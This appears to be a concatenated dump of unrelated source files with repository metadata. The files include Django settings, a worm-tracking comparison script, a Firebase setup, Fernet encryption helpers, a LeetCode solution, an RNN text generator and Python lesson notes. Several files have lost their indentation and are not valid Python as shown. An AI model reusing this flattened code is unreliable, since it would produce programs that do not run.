'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'djangoproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# Local filesystem path for uploaded media files; BASE_DIR is the project
# root (backslashes normalized for Windows paths).
MEDIA_ROOT = os.path.join(BASE_DIR, 'media').replace('\\', '/')
# URL prefix under which uploaded media is served (used when displaying files).
MEDIA_URL = '/media/'
| [
"18717753697@163.com"
] | 18717753697@163.com |
bd692ef3d3cce53cc175de340df496d1c8586914 | eb518a18d8055400c85d1b2f714fe9d4d654b941 | /compare_segworm/_old/head_tail_manual_switched.py | 6948c7b9e0ebe75f72f883facddf4243954e34e8 | [] | no_license | ver228/single-worm-analysis | c755709354025f629f7c774749394743c7b9a46b | 8d0a442fb93ad25aa30743f6c31f883639524a4d | refs/heads/master | 2021-09-14T11:31:17.761390 | 2018-05-12T23:00:54 | 2018-05-12T23:00:54 | 79,457,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,602 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 11 22:01:59 2016
@author: ajaver
"""
import h5py
import tables
import os
import numpy as np
import matplotlib.pylab as plt
from scipy.io import loadmat
import glob
import os
import pandas as pd
from MWTracker.featuresAnalysis.obtainFeaturesHelper import WormFromTable
from MWTracker.featuresAnalysis.obtainFeatures import getMicronsPerPixel, getFPS
good_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-116 (e2310)III on food L_2010_07_29__14_56___3___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/osm-9 (ky10) on food R_2010_06_15__14_57_24___8___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-108 (n501)I on food L_2009_12_10__14_02_38___2___9.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-103 (e1597)II on food R_2010_08_06__15_41_28___8___11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-25 (gk1016)III on food L_2010_01_12__13_07_15___4___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-6 (n592)X on food L_2010_05_11__14_51_15___7___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-14 (n549)X on food L_2010_07_15__16_20___3___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-6 (ok3056)V on food R_2010_01_14__11_35___3___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/gar-2 (ok250)III on food R_2010_07_22__11_23_27___1___3.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food R_2011_05_24__13_03_48___7___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/vab-7 (e1562)III on food L_2011_10_13__11_49_40___1___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-25 (gk1016)III on food R_2010_01_12__13_06_48___2___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-6 (n592)X on food R_2010_05_13__15_47___3___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food L_2010_11_26__16_25_46___6___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flp-16 (ok3085) on food L_2010_01_11__12_35_14___7___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/flr-1 (ut11) on food L_2010_04_09__15_53_02___1___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-32 (n155)I on food l_2010_05_11__16_50_11___7___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-1 (n487)V on food R_2010_07_15__11_47_56___1___4.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/daf-5 (e1386)II on food L_2010_07_22__14_46_33__8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/rab-3 (cy250) on food L_2011_08_04__11_10_43___2___3.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-2 (ok1887) on food r_2010_02_19__14_43_43___8___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-27 (ok151)II on food R_2010_09_24__12_55___3___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-32 (n155)I on food R_2010_05_13__15_03_22___1___11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-16 (e109) on food L_2009_12_11__12_21___3___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-63 (ok1075) on food L_2010_04_16__12_57_13___8___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-12 (n602)V on food L_2010_07_16__12_05_00___1___6.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/gpa-8 (pk435)V on food L_2010_03_11__10_25_35___8___2.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-79 (e1068)III on food L_2010_04_13__15_39_23___8___14.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-46 (n1127)V on food L_2010_08_06__16_02_11___7___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-8 (v488) on food R_2011_09_20__13_33_10___7___7.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/N2 on food L_2010_11_09__15_36_39___1___8.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-60 (e273)V on food L_2010_04_15__13_07_43__9.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/asic-1 (ok415) on food R_2010_06_15__11_26_21___2___3.hdf5'''
partial_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-116 (e2310)III on food L_2010_07_29__14_56___3___8.hdf5
15401-15415
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food L_2010_09_23__12_37_31___8___6.hdf5
19804-19806, 19819-19830, 19886-19893, 19904-19907, 19921-19931, 19938-19938, 19945-19945, 19985-19986, 20055-20055
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/egl-27 (ok151)II on food L_2010_08_05__14_44_24___2___11.hdf5
14045-14045, 14173-14184, 14226-14226, 14298-14298, 14333-14334, 14344-14344, 14378-14378
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/trp-1 (sy691) on food R_2010_04_21__14_59_17___8___10.hdf5
12231-12231, 12242-12243, 12250-12273, 12285-12285, 12295-12299, 12306-12306, 12331-12346, 12421-12457, 12464-12469, 12479-12480, 12664-12664, 12677-12701, 12830-12888, 12895-12923, 12930-12931,
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-104 (e1265)III on food R_2011_10_18__15_39___4___10.hdf5
2608-3747, 3755-5270
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-105 (ok1432) on food L_2010_07_06__11_44_23___2___6.hdf5
1812-1819, 1826-1832
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-15 (ok1214)X on food L_2010_02_24__15_45_04___8___14.hdf5
250-411, 419-424, 700-700, 793-799, 808-811, 1012-1018, 1032-1032, 18761-18814
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food R_2010_09_24__11_35___3___2.hdf5
810-810, 18597-18597, 18608-18608, 23978-23982, 23988-23993
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-38 (e264)I on food L_2010_08_19__12_34_15___1___6.hdf5
7480-7582, 7590-7590, 7596-7596, 7603-7607, 7617-7643, 7652-7652, 7663-7722, 7733-7736, 7806-7963
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-76 (e911)V on food L_2010_04_14__11_22_30___8___5.hdf5
12445-12445, 12455-12459, 12475-12316, 12242-13344, 13354-13362, 13368-15598, 18411-18411, 18510-18510
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-76 (e911)V on food R_2010_04_13__11_06_24___4___3.hdf5
3240-3249, 3258-3265, 3286-3294, 3328-3332, 18547-18547, 18585-18589
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-101 (e1265) on food L_2010_09_17__16_04_15___1___8.hdf5
20530-20530, 20536-23004 '''
bad_track_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-32 (e189) on food L_2009_12_09__15_57_51___2___13.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/acr-21 (ok1314)III on food L_2010_02_24__14_45_13__11.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-17 (e245) on food R_2010_04_16__14_27_23___2___8.hdf5'''
wrong_files_str = '''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-1 (e1598)X on food R_2010_04_14__11_58_21___2___7.hdf5
/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-18 (e81)X on food R_2011_08_09__12_33_45___8___7.hdf5'''
partial_wrong_files_str ='''/Users/ajaver/Desktop/Videos/single_worm/switched_sample/unc-18 (e81)X on food R_2011_08_24__10_24_18__2.hdf5
17709-17735, 17743-17758, 17772-17772, 17782-17788, 17795-17795, 17801-17801'''
good_files = good_files_str.split('\n')
bad_track_files = bad_track_files_str.split('\n')
wrong_files = wrong_files_str.split('\n')
def read_partial_files(f_str):
    """Parse a newline-separated listing of (filename, index-ranges) pairs.

    Odd lines are file names; the line after each is a ", "-separated list
    of "start-end" integer ranges.  Returns ``(filenames, index_dict)``
    where ``index_dict`` maps each filename to a list of (start, end)
    tuples, in input order.
    """
    lines = f_str.split('\n')
    fnames = []
    index_dict = {}
    for pos in range(0, len(lines), 2):
        name = lines[pos]
        # Empty chunks (e.g. from a trailing ", ") are skipped.
        ranges = [tuple(int(v) for v in chunk.split('-'))
                  for chunk in lines[pos + 1].split(', ') if chunk]
        index_dict[name] = ranges
        fnames.append(name)
    return fnames, index_dict
partial_files, bad_index_dict = read_partial_files(partial_files_str)
wrong_partial_files, good_index_dict = read_partial_files(partial_wrong_files_str)
files = bad_track_files + partial_files + wrong_partial_files+ wrong_files + good_files
all_dat = []
for mask_id, masked_image_file in enumerate(files):
dd = masked_image_file[:-5]
segworm_feat_file = dd + '_features.mat'
skeletons_file = dd + '_skeletons.hdf5'
features_file = dd + '_features.hdf5'
if not os.path.exists(features_file):
continue
print(mask_id, masked_image_file)
#read data from the new sekeltons
skeletons = np.zeros(0) #just to be sure i am not using a skeleton for another file
with tables.File(features_file, 'r') as fid:
#if '/features_means' in fid and \
#fid.get_node('/features_means').attrs['has_finished'] and \
#fid.get_node('/features_timeseries').shape[0]>0:
skeletons = fid.get_node('/skeletons')[:]
if skeletons.size > 0:
frame_range = fid.get_node('/features_events/worm_1')._v_attrs['frame_range']
#pad the beginign with np.nan to have the same reference as segworm (time 0)
skeletons = np.pad(skeletons, [(frame_range[0],0), (0,0), (0,0)],
'constant', constant_values=np.nan)
#else:
# continue
with tables.File(skeletons_file, 'r') as fid:
timestamp_raw = fid.get_node('/timestamp/raw')[:].astype(np.int)
#read data from the old skeletons
fvars = loadmat(segworm_feat_file, struct_as_record=False, squeeze_me=True)
micronsPerPixels_x = fvars['info'].video.resolution.micronsPerPixels.x
micronsPerPixels_y = fvars['info'].video.resolution.micronsPerPixels.y
segworm_x = -fvars['worm'].posture.skeleton.x.T
segworm_y = -fvars['worm'].posture.skeleton.y.T
segworm = np.stack((segworm_x,segworm_y), axis=2)
#get the total number of skeletons
tot_skel = np.sum(~np.isnan(skeletons[:,0,0]))
tot_seg = np.sum(~np.isnan(segworm[:,0,0]))
#correct in case the data has different size shape
max_n_skel = min(segworm.shape[0], skeletons.shape[0])
skeletons = skeletons[:max_n_skel]
segworm = segworm[:max_n_skel]
#shift the skeletons coordinate system to one that diminushes the errors the most.
seg_shift = np.nanmedian(skeletons-segworm, axis = (0,1))
segworm += seg_shift
#print('S', seg_shift)
#%%
R_ori = np.sum(np.sqrt(np.sum((skeletons-segworm)**2, axis=2)), axis=1)
R_inv = np.sum(np.sqrt(np.sum((skeletons[:,::-1,:]-segworm)**2, axis=2)), axis=1)
bad_ind = np.isnan(R_ori)
ht_mismatch = np.argmin((R_ori, R_inv), axis =0)
ht_mismatch[bad_ind] = 0
#%%
bad_vec = np.zeros(skeletons.shape[0], np.bool)
if masked_image_file in bad_index_dict:
bad_indexes = bad_index_dict[masked_image_file]
for bad_index in bad_indexes:
bad_timestamp = timestamp_raw[bad_index[0]:bad_index[1]+1]
bad_vec[bad_timestamp] = True
#make false the once without skeletons to avoid double counting
bad_vec[np.isnan(skeletons[:,0,0])] = False
elif masked_image_file in good_index_dict:
good_indexes = good_index_dict[masked_image_file]
bad_vec = ~np.isnan(skeletons[:,0,0])
for good_index in good_indexes:
good_timestamp = timestamp_raw[good_index[0]:good_index[1]+1]
bad_vec[good_timestamp] = False
elif masked_image_file in wrong_files:
bad_vec = ~np.isnan(skeletons[:,0,0])
else:
tot_bad_skel = 0
tot_bad_skel = sum(bad_vec)
good_ind = ~bad_ind
tot_common = np.sum(good_ind)
#%%
new1old0 = np.sum(ht_mismatch & ~bad_vec & good_ind)
new0old1 = np.sum(ht_mismatch & bad_vec & good_ind)
new1old1 = np.sum(~ht_mismatch & ~bad_vec & good_ind)
new0old0 = np.sum(~ht_mismatch & bad_vec & good_ind)
#%%
all_dat.append((tot_skel, tot_seg, tot_bad_skel, tot_common, new1old0, new0old1, new1old1, new0old0))
#%%
if False:
w_xlim = w_ylim = (-10, skeletons.shape[0]+10)
plt.figure()
plt.subplot(2,1,1)
plt.plot(skeletons[:,1,1], 'b')
plt.plot(segworm[:,1,1], 'r')
plt.xlim(w_ylim)
plt.ylabel('Y coord')
plt.subplot(2,1,2)
plt.plot(skeletons[:,1,0], 'b')
plt.plot(segworm[:,1,0], 'r')
plt.xlim(w_xlim)
plt.ylabel('X coord')
plt.xlabel('Frame Number')
#%%
tot_skel, tot_seg, tot_bad_skel, tot_common, new1old0, new0old1, new1old1, new0old0 = zip(*all_dat)
only_seg = tuple(x-y for x,y in zip(tot_seg, tot_common))
only_skel = tuple(x-y for x,y in zip(tot_skel, tot_common))
#%%
#%%
tot_skels = sum(tot_skel)
tot_segs = sum(tot_seg)
tot_commons = sum(tot_common)
tot_union = tot_skels + tot_segs - tot_commons
frac_only_seg = (tot_skels - tot_commons) / tot_union
frac_only_skel = (tot_segs - tot_commons) / tot_union
frac_mutual = tot_commons / tot_union
#%%
frac_skel_bad = sum(tot_bad_skel)/tot_skels
#%%
skel_bad_common =1-(sum(new1old0) + sum(new1old1))/tot_commons
seg_bad_common = 1-(sum(new0old1) + sum(new1old1))/tot_commons
#%%
main_dir = '/Users/ajaver/Desktop/Videos/single_worm/switched_sample/'
all_files = [os.path.join(main_dir, x) for x in os.listdir(main_dir) if not '_features' in x and not '_skeletons' in x and not x.startswith('.')]
print([x for x in all_files if x not in files])
#%%
bad_old = [(x+y)/z for x,y,z in zip(new1old0, new0old0, tot_common)]
bad_new = [(x+y)/z for x,y,z in zip(new0old1, new0old0, tot_common)]
plt.figure()
plt.plot(bad_old, 'sr')
plt.plot(bad_new, 'og')
| [
"ajaver@MRC-8791.local"
] | ajaver@MRC-8791.local |
015e15bf458707fae3448d4b5d47aa6a5ef36ca0 | 62700ed2b150391d8c4044d122eed14f2939c96a | /conncFirebase.py | e0b7b1cd1b34a6d9659b98fc74f7bde32c04a1d1 | [
"MIT"
] | permissive | vaishvikmaisuria/Jarvis-Cloud-Vision-Platform | 07648f66529e60879c832c1c86907c3d2d177287 | 15bc7c36deb420efcc62ded0dfcadd4068512514 | refs/heads/master | 2020-12-15T04:01:38.794335 | 2020-02-12T15:39:44 | 2020-02-12T15:39:44 | 240,048,428 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | import firebase_admin
from firebase_admin import credentials, firestore
import json
cred = credentials.Certificate('./supervisor-f2f29-firebase-adminsdk-l2twy-ae836f2735.json')
default_app = firebase_admin.initialize_app(cred)
db = firestore.client()
# when you want to add something create a similir set thing
doc_ref = db.collection(u'users').document(u'imageClassifier')
## Sets the data at this location to the given value.
#doc_ref.set({ u'name': "user", u'type': "Image name"})
## Returns the value, and optionally the ETag, at the current location of the database.
#for k in db.collection('users').stream():
# print(k.to_dict())
# print(k.id)
## Updates the specified child keys of this Reference to the provided values.
## doc_ref.update({ u'name': "user", u'type': "Cool Guy" })
## Creates a new child node.
# doc_ref.delete()
## Deletes this node from the database.
# doc_ref.push
print("Done")
| [
"vaishvik.maisuria@gmail.com"
] | vaishvik.maisuria@gmail.com |
cee8e55fea8287b1e38f4362812922d355299b4e | 601e07f347024c66fea1d8a86f5a795517123713 | /03-DRF-LEVEL-ONE/job_board/jobs/api/serializers.py | 13a0e2e4da771c1fa08c18ffb3814769017d2d3e | [] | no_license | frankeyey/django-rest-framework-learn | 817c8e3bc7763043745ed34f3258d60843be2faa | 8171eeb1742e5ad2bd9d57f8bbc7eb5538d0fd89 | refs/heads/main | 2023-03-03T22:18:32.380953 | 2021-02-14T07:36:41 | 2021-02-14T07:36:41 | 338,533,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | from rest_framework import serializers
from jobs.models import JobOffer
class JobOfferSerializer(serializers.ModelSerializer):
    """DRF model serializer exposing every field of the JobOffer model."""
    class Meta:
        model = JobOffer
        fields = "__all__"
"frankeyc777@gmail.com"
] | frankeyc777@gmail.com |
dc002ed84d38f8b5d09c1f49690bf3381da5bf9f | 518a869a4c29326b45a9c0faf415644e3da7a5d5 | /actors/encrypt_utils.py | c71436f9c0595ff34943d33191c553b96b06e63c | [
"BSD-3-Clause"
] | permissive | TACC/abaco | ee41ce0a9ad7590cc9d94ab5afd3d68d5ccd7315 | 155e0e9102d9a49b334b49f85c45736198752626 | refs/heads/master | 2023-09-04T11:56:12.676863 | 2023-08-14T17:25:51 | 2023-08-14T17:25:51 | 39,394,579 | 30 | 13 | BSD-3-Clause | 2023-06-05T23:38:34 | 2015-07-20T16:15:42 | Python | UTF-8 | Python | false | false | 794 | py | from cryptography.fernet import Fernet
from config import Config
key = Config.get('web', 'encryption_key')
f = Fernet(key.encode())
def encrypt(value):
    """Encrypt the str *value* with the module-level Fernet key and return
    the ciphertext token as a regular (unicode) string."""
    # Fernet works on bytes, so encode before encrypting; Abaco expects
    # plain strings, so decode the resulting token back to str.
    token = f.encrypt(value.encode())
    return token.decode("utf-8")
def decrypt(value):
    """Decrypt a Fernet ciphertext token *value* (a str) and return the
    plaintext as a regular (unicode) string."""
    # Fernet wants bytes in; Abaco wants str out.
    plaintext = f.decrypt(value.encode())
    return plaintext.decode("utf-8")
"nraufiero@gmail.com"
] | nraufiero@gmail.com |
aa0b7feda3f4111dee7da99f5897b04ae45099c3 | 7cc312f65eb2d6af491e8b13ef57ff3ba2babf7f | /leetcode/python3/convert-sorted-array-to-binary-search-tree.py | 766b52f6a24b8899262f7849ba9c673fe7907deb | [] | no_license | tangwz/leetcode | df1c978999f4ed76254eb82be08785957052dca9 | 38e860a2fd103958d12a64a87e32f8c9c20d0a59 | refs/heads/master | 2021-01-22T13:13:04.181337 | 2019-11-26T08:00:39 | 2019-11-26T08:00:39 | 30,180,759 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | #
# @lc app=leetcode id=108 lang=python
#
# [108] Convert Sorted Array to Binary Search Tree
#
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def sortedArrayToBST(self, nums):
        """
        Build a height-balanced BST from an ascending sorted list by always
        rooting each subtree at the middle element of its range.
        :type nums: List[int]
        :rtype: TreeNode
        """
        def build(lo, hi):
            # Construct the subtree for nums[lo:hi); empty range -> no node.
            if lo >= hi:
                return None
            mid = lo + (hi - lo) // 2
            root = TreeNode(nums[mid])
            root.left = build(lo, mid)
            root.right = build(mid + 1, hi)
            return root
        return build(0, len(nums))
| [
"tangwz.com@gmail.com"
] | tangwz.com@gmail.com |
df431e432664d389698f5825dd25db4686507c26 | 2f9e7a6a58bb5937e4563730f933760838cee99a | /config/settings/local.py | 4aac7b797fb339605d5f91b7dfa62c3c512822f6 | [] | no_license | jsmera/warm-cliffs-42549 | 35b564a0c17dd2b37e98bbaa56f2f2f24462453a | 22440965f37bb3ae1bd0260e0c6e0ef510496ec6 | refs/heads/main | 2023-01-22T13:01:34.547348 | 2020-11-30T03:49:00 | 2020-11-30T03:49:00 | 315,156,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | from .common import *
INSTALLED_APPS += [
"debug_toolbar",
]
MIDDLEWARE += [
"debug_toolbar.middleware.DebugToolbarMiddleware",
]
INTERNAL_IPS = [
"127.0.0.1",
]
DEBUG = True
| [
"merac1999@gmail.com"
] | merac1999@gmail.com |
2500d720d0d205e1657e9e81af3e2a45a51b16bc | 0dd959ae1da4de1bd009db0db52fb792e38fbbd5 | /102/colors.py | e59a41187c1d5090e78f57c192e4460afefeea53 | [] | no_license | janinewhite/bitesofpy | 849d2963bef8024fb900412fa06ab340e1b7fd73 | f57e2a15b4c2f685abfbf5647e5638578aafcc7e | refs/heads/master | 2020-07-24T07:20:30.755847 | 2020-02-14T15:50:55 | 2020-02-14T15:50:55 | 207,844,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 712 | py | VALID_COLORS = ['blue', 'yellow', 'red']
def print_colors():
    """In the while loop ask the user to enter a color,
    lowercase it and store it in a variable. Next check:
    - if 'quit' was entered for color, print 'bye' and break.
    - if the color is not in VALID_COLORS, print 'Not a valid color' and continue.
    - otherwise print the color in lower case."""
    # Cleanup: input() already returns a str (the str() wrapper was
    # redundant), the chose_quit flag + `while not` + break combination
    # collapses to a plain `while True`, and the trailing `pass` was dead.
    while True:
        color = input("Enter a color.").lower()
        if color == "quit":
            print("bye")
            break
        if color in VALID_COLORS:
            print(color)
        else:
            print("Not a valid color")
"janine.white@gmail.com"
] | janine.white@gmail.com |
533b09301546818931ce3a0cdc6ca772e90561a6 | d3042b039c86cddc6422d5b927a7c9f72ef2cee0 | /rnn_play.py | 14ed01d00d5f2b3ef0d9198cfa0e284ff4a42627 | [] | no_license | chiriacandrei25/Recurrent-Neural-Network | 15c5f96a849092768010967368ff25039969a36a | 6004f184305034865ad9d4b1a8fc5d6e98b991a5 | refs/heads/master | 2020-03-23T07:31:43.936631 | 2018-09-10T12:55:59 | 2018-09-10T12:55:59 | 141,277,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,369 | py | # encoding: UTF-8
# Copyright 2017 Google.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import numpy as np
import my_txtutils
import checker
# these must match what was saved !
ALPHASIZE = my_txtutils.ALPHASIZE
directory = "C:/Users/achiriac/Desktop/Workspace/RNN/validation_test/*.txt"
NLAYERS = 3
INTERNALSIZE = 512
eC0 = "C:/Users/achiriac/Desktop/Workspace/RNN/checkpoints/rnn_train_1535104117-12000000"
eC1 = "C:/Users/achiriac/Desktop/Workspace/RNN/checkpoints/rnn_train_1535360733-5800000"
author = eC0
author1 = eC1
def validate_test():
    """Run validation on each of the two saved checkpoints in turn."""
    for checkpoint in (author, author1):
        validate_on_network(checkpoint)
def validate_on_network(auth):
    """Restore the checkpoint at path `auth` and print loss/accuracy on the
    text files matched by the module-level `directory` glob.

    NOTE(review): the tensor names fed and fetched below
    ('inputs/X:0', 'display_data/batchloss:0', ...) must match the graph
    that was saved alongside the checkpoint.
    """
    with tf.Session() as sess:
        # rebuild the graph from the .meta file, then load the weights
        new_saver = tf.train.import_meta_graph(auth + '.meta')
        new_saver.restore(sess, auth)
        valitext, _, __ = my_txtutils.read_data_files(directory, validation=False)
        VALI_SEQLEN = 1 * 64 # Sequence length for validation. State will be wrong at the start of each sequence.
        bsize = len(valitext) // VALI_SEQLEN
        # all of the validation text is evaluated as one large batch
        vali_x, vali_y, _ = next(
            my_txtutils.rnn_minibatch_sequencer(valitext, bsize, VALI_SEQLEN, 1)) # all data in 1 batch
        # start every sequence from a zeroed recurrent state
        vali_nullstate = np.zeros([bsize, INTERNALSIZE * NLAYERS])
        feed_dict = {'inputs/X:0': vali_x, 'target/Y_:0': vali_y, 'model/pkeep:0': 1.0,
                     'hidden_state/Hin:0': vali_nullstate, 'model/batchsize:0': bsize}
        ls, acc = sess.run(["display_data/batchloss:0", "display_data/accuracy:0"], feed_dict=feed_dict)
        my_txtutils.print_validation_stats(ls, acc)
def generate_text():
    """Restore the checkpoint at the module-level `author` path and stream
    generated characters to stdout one at a time.

    NOTE(review): the loop bound of 1e9 iterations is effectively infinite;
    stop the program with Ctrl-C.
    """
    with tf.Session() as sess:
        new_saver = tf.train.import_meta_graph(author + '.meta')
        new_saver.restore(sess, author)
        # seed the generator with a single character, 'E'
        x = my_txtutils.convert_from_alphabet(ord("E"))
        x = np.array([[x]]) # shape [BATCHSIZE, SEQLEN] with BATCHSIZE=1 and SEQLEN=1
        # initial values
        y = x
        h = np.zeros([1, INTERNALSIZE * NLAYERS], dtype=np.float32) # [ BATCHSIZE, INTERNALSIZE * NLAYERS]
        for i in range(1000000000):
            # one step: feed the previous character and recurrent state,
            # fetch the output distribution and the new state
            yo, h = sess.run(['softmax_layer/Yo:0', 'GRU/H:0'],
                             feed_dict={'inputs/X:0': y, 'model/pkeep:0': 1., 'hidden_state/Hin:0': h,
                                        'model/batchsize:0': 1})
            # If sampling is done from the topn most likely characters, the generated text
            # is more credible. If topn is not set, it defaults to the full distribution (ALPHASIZE).
            # Recommended: topn = 10 for intermediate checkpoints, topn = 2 or 3 for fully trained checkpoints.
            c = my_txtutils.sample_from_probabilities(yo, topn=2)
            y = np.array([[c]]) # shape [BATCHSIZE, SEQLEN] with BATCHSIZE=1 and SEQLEN=1
            c = chr(my_txtutils.convert_to_alphabet(c))
            print(c, end="")
validate_test() | [
"noreply@github.com"
] | chiriacandrei25.noreply@github.com |
248fc87af3d3638daf6aac3c7c91e9a55a60eca9 | 6baf796e259b56313723e19bd00fd2e5433d6443 | /Intermediate_Python.py | 1b63a620274f5139bd266f804af4f3db41727bcd | [] | no_license | toeysk130/Python_Lesson | 8756283ef396d1553505d4a1462374baa7de6982 | 0ba32ce1bdb89d568e222e589b735a0d93ebb3c4 | refs/heads/main | 2023-08-15T04:44:48.236389 | 2021-10-07T00:36:59 | 2021-10-07T00:36:59 | 413,620,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,255 | py | ### Question to find out
# Why Tuple is more faster than List?
##################################################### List: ordered,mutablem allows duplicate elements
myList = ["banana", "cherry", "apple","apple"]
print(myList)
myList2 = [5, True, "apple" ,"banana"] # List allow different datatypes
print(myList2[-1]) # Select reverse of element in array
if "banana" in myList:
print("yes")
else:
print("no")
item = myList.pop() #Get last element from array (Stack)
myList.remove("apple") #Remove only one match
myList.reverse()
myList.clear()
testSort = [2,4,0,-2,3,6,-7]
print(sorted(testSort)) # Sorted elements in array
mylist = [1] * 10 # Create new list with 1 in 10 times Ex. [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
mylist = [1,2,3,4,5,6,7,8,9]
a = mylist[1:5] # Select begin - end of the array elements Ex. [2, 3, 4, 5]
a = mylist[::2] # select begin to end with 2 steps
###### ************* Important
list_org = ["banana", "cherry", "apple"]
list_cpy = list_org #### Both are referd to the same bytes in the memory
list_cpy.append("lemon")
print(list_cpy)
print(list_org)
list_cpy = list_org.copy() # 3 Ways to copy only data from one array to another
list_cpy = list(list_org)
list_cpy = list_org[:]
list_cpy.append("orange")
print(list_cpy)
print(list_org)
mylist = [1,2,3,4,5,6,7,8,9]
b = [i*i for i in mylist] # Expression with for loop interating
print(mylist)
print(b)
print('"""""""""""""""""""""""""""""')
##################################################### Tuple: ordered, immutabele, allows duplicate elements
mytuple = "Max", 28, "Boston"
mytuple = tuple(["Max", 28, "Boston"])
print(type(mytuple))
print(mytuple)
item = mytuple[-1]
print(item)
# mytuple[0] = "test" ## Can't run because tuple is immutable
for x in mytuple:
print(x)
if "Boston" in mytuple:
print("Yes")
else:
print("No")
my_tuple = ('a','p','p','l','e')
print(len(my_tuple))
print(my_tuple.count('p'))
print("index:" + str(my_tuple.index('l')))
my_list = list(my_tuple)
print(my_list)
my_tuple2 = tuple(mylist)
print(my_tuple2)
a = (1,2,3,4,5,6,7,8,9)
b = a[2:5]
print(b)
my_tuple = "Max", 28, "Boston"
